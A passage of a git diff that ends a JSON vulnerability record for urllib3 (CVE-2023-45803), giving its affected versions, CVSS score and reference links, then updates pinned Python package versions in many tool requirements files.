"0.4.1", - "1.0", - "1.0.1", - "1.0.2", - "1.1", - "1.10", - "1.10.1", - "1.10.2", - "1.10.3", - "1.10.4", - "1.11", - "1.12", - "1.13", - "1.13.1", - "1.14", - "1.15", - "1.15.1", - "1.16", - "1.17", - "1.18", - "1.18.1", - "1.19", - "1.19.1", - "1.2", - "1.2.1", - "1.2.2", - "1.20", - "1.21", - "1.21.1", - "1.22", - "1.23", - "1.24", - "1.24.1", - "1.24.2", - "1.24.3", - "1.25", - "1.25.1", - "1.25.10", - "1.25.11", - "1.25.2", - "1.25.3", - "1.25.4", - "1.25.5", - "1.25.6", - "1.25.7", - "1.25.8", - "1.25.9", - "1.26.0", - "1.26.1", - "1.26.10", - "1.26.11", - "1.26.12", - "1.26.13", - "1.26.14", - "1.26.15", - "1.26.16", - "1.26.17", - "1.26.2", - "1.26.3", - "1.26.4", - "1.26.5", - "1.26.6", - "1.26.7", - "1.26.8", - "1.26.9", - "1.3", - "1.4", - "1.5", - "1.6", - "1.7", - "1.7.1", - "1.8", - "1.8.2", - "1.8.3", - "1.9", - "1.9.1", - "2.0.0", - "2.0.1", - "2.0.2", - "2.0.3", - "2.0.4", - "2.0.5", - "2.0.6" - ], - "database_specific": { - "source": "https://github.com/pypa/advisory-database/blob/main/vulns/urllib3/PYSEC-2023-212.yaml" - } - } - ], - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N" - } - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4" - }, - { - "type": "WEB", - "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get" - }, - { - "type": "FIX", - "url": "https://github.com/urllib3/urllib3/commit/4e98d57809dacab1cbe625fddeec1a290c478ea9" - }, - { - "type": "ARTICLE", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX/" - } - ] - } - ], - "groups": [ - { - "ids": [ - "GHSA-g4mx-q9vg-27p4", - "PYSEC-2023-212" - ], - "aliases": [ - "CVE-2023-45803", - "GHSA-g4mx-q9vg-27p4", - "PYSEC-2023-212" - ] - } - ] - } -] \ No newline at end of file diff --git a/requirements/awscli-local-requirements.txt b/requirements/awscli-local-requirements.txt index b57c8bcc..c0145c13 100644 --- a/requirements/awscli-local-requirements.txt +++ b/requirements/awscli-local-requirements.txt @@ -1,7 +1,8 @@ -boto3==1.34.11 -botocore==1.34.11 +boto3==1.34.51 +botocore==1.34.51 jmespath==1.0.1 localstack-client==2.5 python-dateutil==2.8.2 s3transfer==0.10.0 +six==1.16.0 urllib3==2.0.7 diff --git a/requirements/bzt-requirements.txt b/requirements/bzt-requirements.txt index 5b509e52..87e50ba2 100644 --- a/requirements/bzt-requirements.txt +++ b/requirements/bzt-requirements.txt @@ -15,19 +15,25 @@ hdrpy==0.3.3 humanize==4.9.0 idna==3.6 influxdb==5.3.1 +lxml==5.1.0 molotov==2.6 msgpack==1.0.7 multidict==6.0.5 multiprocess==0.70.16 progressbar33==2.4 prompt-toolkit==3.0.43 +psutil==5.9.8 python-dateutil==2.8.2 python-engineio==4.9.0 python-socketio==5.11.1 +pytz==2024.1 pyvirtualdisplay==3.0 +pyyaml==6.0.1 rapidfuzz==3.6.1 requests==2.31.0 +setuptools==69.1.1 simple-websocket==1.0.0 +six==1.16.0 terminaltables==3.1.10 urllib3==1.26.17 urwid==2.1.2 diff --git a/requirements/codelimit-requirements.txt b/requirements/codelimit-requirements.txt index da9f3ec7..604a8c97 100644 --- a/requirements/codelimit-requirements.txt +++ b/requirements/codelimit-requirements.txt @@ -2,6 +2,7 @@ aiohttp==3.9.3 aiosignal==1.3.1 attrs==23.2.0 charset-normalizer==3.3.2 +click==8.1.7 colorama==0.4.6 frozenlist==1.4.1 halo==0.0.31 @@ -14,13 +15,16 @@ mdit-py-plugins==0.4.0 mdurl==0.1.2 multidict==6.0.5 plotext==5.2.8 +pygments==2.17.2 pyyaml==6.0.1 requests==2.31.0 rich==13.7.0 +six==1.16.0 spinners==0.0.24 termcolor==2.4.0 textual==0.34.0 typer==0.9.0 +typing-extensions==4.9.0 uc-micro-py==1.0.3 urllib3==2.2.1 yarl==1.9.4 diff --git a/requirements/conda-lock-requirements.txt b/requirements/conda-lock-requirements.txt index ae1245aa..0b69d328 100644 --- a/requirements/conda-lock-requirements.txt +++ b/requirements/conda-lock-requirements.txt @@ -7,25 +7,36 @@ click==8.1.7 click-default-group==1.2.4 clikit==0.6.2 crashtest==0.3.1 +distlib==0.3.8 ensureconda==1.4.4 +filelock==3.13.1 gitdb==4.0.11 -gitpython==3.1.41 +gitpython==3.1.42 html5lib==1.1 idna==3.6 +jaraco-classes==3.3.1 jinja2==3.1.3 +keyring==24.3.1 markupsafe==2.1.5 +more-itertools==10.2.0 msgpack==1.0.7 +packaging==23.2 pastel==0.2.1 pkginfo==1.9.6 -pydantic==2.6.1 -pydantic-core==2.16.2 +platformdirs==4.2.0 +pydantic==2.6.3 +pydantic-core==2.16.3 pylev==1.4.0 +pyyaml==6.0.1 requests==2.31.0 ruamel-yaml==0.18.6 ruamel-yaml-clib==0.2.8 -setuptools==69.0.3 +setuptools==69.1.1 +six==1.16.0 smmap==5.0.1 -tomlkit==0.12.3 +tomlkit==0.12.4 toolz==0.12.1 +typing-extensions==4.10.0 urllib3==1.26.18 +virtualenv==20.25.1 webencodings==0.5.1 diff --git a/requirements/cycode-requirements.txt b/requirements/cycode-requirements.txt index a50245cb..36d4505b 100644 --- a/requirements/cycode-requirements.txt +++ b/requirements/cycode-requirements.txt @@ -5,7 +5,7 @@ charset-normalizer==3.3.2 click==8.1.7 colorama==0.4.6 gitdb==4.0.11 -gitpython==3.1.41 +gitpython==3.1.42 idna==3.6 marshmallow==3.20.2 packaging==23.2 diff --git a/requirements/dotbot-requirements.txt b/requirements/dotbot-requirements.txt new file mode 100644 index 00000000..cf39afa6 --- /dev/null +++ b/requirements/dotbot-requirements.txt @@ -0,0 +1 @@ +pyyaml==6.0.1 diff --git a/requirements/esphome-requirements.txt b/requirements/esphome-requirements.txt index 156fdb85..254480d5 100644 --- a/requirements/esphome-requirements.txt +++ b/requirements/esphome-requirements.txt @@ -1,21 +1,47 @@ aioesphomeapi==21.0.2 aiohappyeyeballs==2.3.2 +ajsonrpc==1.2.0 +anyio==4.3.0 +argcomplete==3.2.2 bitarray==2.9.2 bitstring==4.1.4 +bottle==0.12.25 chacha20poly1305-reuseable==0.12.1 +chardet==5.2.0 +charset-normalizer==3.3.2 +click==8.1.7 +colorama==0.4.6 ecdsa==0.18.0 esphome-dashboard==20231107.0 esptool==4.7.0 +h11==0.14.0 icmplib==3.0.4 +idna==3.6 ifaddr==0.2.0 intelhex==2.3.0 kconfiglib==13.7.1 +marshmallow==3.21.0 noiseprotocol==0.3.1 +packaging==23.2 paho-mqtt==1.6.1 +platformio==6.1.13 +pyelftools==0.30 +pyparsing==3.1.1 +pyserial==3.5 python-magic==0.4.27 +pyyaml==6.0.1 reedsolo==1.7.0 +requests==2.31.0 +semantic-version==2.10.0 +six==1.16.0 +sniffio==1.3.1 +starlette==0.35.1 +tabulate==0.9.0 tornado==6.4 tzdata==2024.1 tzlocal==5.2 +urllib3==2.2.1 +uvicorn==0.25.0 voluptuous==0.14.1 +wsproto==1.2.0 zeroconf==0.131.0 diff --git a/requirements/fabric-requirements.txt b/requirements/fabric-requirements.txt index 7af2a7ff..af6894ba 100644 --- a/requirements/fabric-requirements.txt +++ b/requirements/fabric-requirements.txt @@ -1,6 +1,7 @@ bcrypt==4.1.2 decorator==5.1.1 deprecated==1.2.14 +invoke==2.2.0 paramiko==3.4.0 pynacl==1.5.0 wrapt==1.16.0 diff --git a/requirements/jc-requirements.txt b/requirements/jc-requirements.txt index 6ce305fd..d3782b84 100644 --- a/requirements/jc-requirements.txt +++ b/requirements/jc-requirements.txt @@ -1,3 +1,4 @@ +pygments==2.17.2 ruamel-yaml==0.18.6 ruamel-yaml-clib==0.2.8 xmltodict==0.13.0 diff --git a/requirements/jello-requirements.txt b/requirements/jello-requirements.txt new file mode 100644 index 00000000..d6f6e4db --- /dev/null +++ b/requirements/jello-requirements.txt @@ -0,0 +1 @@ +pygments==2.17.2 diff --git a/requirements/ocrmypdf-requirements.txt b/requirements/ocrmypdf-requirements.txt index 0c0546e5..93f9e7c9 100644 --- a/requirements/ocrmypdf-requirements.txt +++ b/requirements/ocrmypdf-requirements.txt @@ -1,7 +1,14 @@ charset-normalizer==3.3.2 +deprecated==1.2.14 deprecation==2.1.0 +img2pdf==0.5.1 +lxml==5.1.0 markdown-it-py==3.0.0 mdurl==0.1.2 +packaging==23.2 pdfminer-six==20231228 +pikepdf==8.13.0 pluggy==1.4.0 -rich==13.7.0 +pygments==2.17.2 +rich==13.7.1 +wrapt==1.16.0 diff --git a/requirements/openai-whisper-requirements.txt b/requirements/openai-whisper-requirements.txt index cea9166a..fde8b081 100644 --- a/requirements/openai-whisper-requirements.txt +++ b/requirements/openai-whisper-requirements.txt @@ -1,16 +1,10 @@ charset-normalizer==3.3.2 -filelock==3.13.1 -fsspec==2023.10.0 -idna==3.4 -jinja2==3.1.2 -llvmlite==0.41.1 -more-itertools==10.1.0 -mpmath==1.3.0 -networkx==3.2.1 -numba==0.58.1 -regex==2023.10.3 +idna==3.6 +llvmlite==0.42.0 +more-itertools==10.2.0 +numba==0.59.0 +regex==2023.12.25 requests==2.31.0 -sympy==1.12 -tiktoken==0.5.1 -tqdm==4.66.1 -urllib3==2.1.0 +tiktoken==0.6.0 +tqdm==4.66.2 +urllib3==2.2.1 diff --git a/requirements/pytorch-requirements.txt b/requirements/pytorch-requirements.txt index 265c1d8c..51da2217 100644 --- a/requirements/pytorch-requirements.txt +++ b/requirements/pytorch-requirements.txt @@ -1 +1,11 @@ +filelock==3.13.1 +fsspec==2024.2.0 +jinja2==3.1.3 +markupsafe==2.1.5 +mpmath==1.3.0 +networkx==3.2.1 opt-einsum==3.3.0 +pyyaml==6.0.1 +setuptools==69.1.1 +sympy==1.12 +typing-extensions==4.9.0 diff --git a/requirements/torchvision-requirements.txt b/requirements/torchvision-requirements.txt index 68bf0810..221bb752 100644 --- a/requirements/torchvision-requirements.txt +++ b/requirements/torchvision-requirements.txt @@ -1,4 +1,4 @@ -charset-normalizer==3.3.0 -idna==3.4 +charset-normalizer==3.3.2 +idna==3.6 requests==2.31.0 -urllib3==2.0.6 +urllib3==2.2.1